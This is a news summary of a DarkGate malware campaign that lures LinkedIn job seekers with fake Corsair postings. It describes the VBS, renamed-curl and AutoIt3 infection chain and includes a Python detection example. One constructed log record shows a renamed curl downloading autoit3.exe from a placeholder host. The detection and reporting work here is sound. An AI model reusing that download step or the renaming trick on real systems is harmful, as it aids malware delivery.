Date: 2023-10-20

Summary: A Vietnamese cybercriminal ring is using fake LinkedIn posts and direct messages to distribute DarkGate malware to unsuspecting job seekers. The scam uses Corsair’s name to trick victims into downloading a suspicious zip file containing files related to a fake job opening. Once downloaded, the DarkGate malware is executed and attempts to extract sensitive information from the victims’ computer. DarkGate specifically targets Facebook Business accounts, attempting to gain administrator access and launch fraudulent ad campaigns. Users are advised to be cautious with unfamiliar or suspicious-looking posts and direct messages, and to refrain from downloading and opening zip files without verifying their source.

In a recent report by Bleeping Computer, it has come to light that cybercriminals are using fake job postings to spread DarkGate malware. The perpetrators, a Vietnamese cybercriminal ring, have been targeting LinkedIn users in the United States, United Kingdom, and India, claiming that Corsair, a prominent gaming hardware and accessories company, is hiring a Facebook Ads specialist.

The fake LinkedIn posts and direct messages contain a link to a suspicious URL that appears to be connected to Corsair. However, the link leads unsuspecting job applicants to a zip file named “Salary and new products.8.2.1.zip,” hosted on Dropbox or Google Drive. Inside the zip file are files such as a job description document, a salary and new products text file, and a salary and products PDF.

Upon inspecting the archive, security researchers at WithSecure discovered a VBS script that copies the Windows binary curl.exe to a different location and renames it. This renamed file then connects to an external site to download the autoit3.exe and autoit3 script. The executed script deploys the DarkGate malware, which is designed to extract sensitive information from its targets.
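The chain described above (a VBS script copies and renames curl.exe, and the renamed binary then fetches the AutoIt3 interpreter and script) gives a detection engineer concrete signals: a process whose PE original filename is curl.exe but whose on-disk name is different, a script host spawning that downloader or the AutoIt interpreter, and a command line fetching an AutoIt3 payload. The following is an added example, not code from the article or from WithSecure, that runs those checks over constructed Sysmon-style process-creation records; the field names, paths, and URLs are assumptions, and the benign curl invocations are included to show the rules do not fire on them.

```python
# Constructed, Sysmon-style process-creation records (not telemetry from the
# article). Field layout is an assumption modelled on Sysmon Event ID 1.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\curl.exe|OriginalFileName=curl.exe|"
    "ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=curl.exe -s https://example.org/",
    "Image=C:\\Users\\u\\AppData\\Local\\Temp\\svchost.exe|OriginalFileName=curl.exe|"
    "ParentImage=C:\\Windows\\System32\\wscript.exe|"
    "CommandLine=svchost.exe -o autoit3.exe http://placeholder.invalid/autoit3.exe",
    "Image=C:\\Users\\u\\AppData\\Local\\Temp\\autoit3.exe|OriginalFileName=AutoIt3.exe|"
    "ParentImage=C:\\Windows\\System32\\wscript.exe|CommandLine=autoit3.exe script.au3",
    "Image=C:\\Program Files\\Git\\mingw64\\bin\\curl.exe|OriginalFileName=curl.exe|"
    "ParentImage=C:\\Program Files\\Git\\bin\\bash.exe|CommandLine=curl -O https://example.org/file",
]


def parse_event(line):
    """Split a 'key=value|key=value' record into a dict (first '=' only)."""
    return dict(kv.split("=", 1) for kv in line.split("|"))


def basename(path):
    """Lower-cased final path component, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the reasons an event matches the renamed-curl / AutoIt3 chain."""
    reasons = []
    image = basename(event.get("Image", ""))
    orig = event.get("OriginalFileName", "").lower()
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()
    # Copied-and-renamed curl: version info still says curl.exe, disk name differs.
    if orig == "curl.exe" and image != "curl.exe":
        reasons.append("renamed curl.exe")
    # Script host (the VBS stage) launching the downloader or the AutoIt interpreter.
    if parent in ("wscript.exe", "cscript.exe") and orig in ("curl.exe", "autoit3.exe"):
        reasons.append(f"{orig} spawned by {parent}")
    # The renamed downloader pulling the AutoIt3 payload.
    if orig == "curl.exe" and "autoit3" in cmd:
        reasons.append("curl fetching AutoIt3 payload")
    return reasons


def scan(lines):
    """Map record index -> list of match reasons, for records that matched."""
    hits = {i: classify(parse_event(line)) for i, line in enumerate(lines)}
    return {i: r for i, r in hits.items() if r}
```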

DarkGate, a sibling malware to the previously identified Ducktail, has a specialized component that specifically targets Facebook Business accounts. It attempts to gain access to a Facebook Business account by locating it and adding the attacker to the account as an administrator. Moreover, it even has the functionality to create and publish fraudulent ad campaigns from the compromised device.

To avoid falling victim to this scam, it is advised that users exercise caution when dealing with unfamiliar or suspicious-looking posts and direct messages. It is important not to download and open zip files without verifying their source. Relying solely on antivirus software may not always be enough to protect against such attacks.

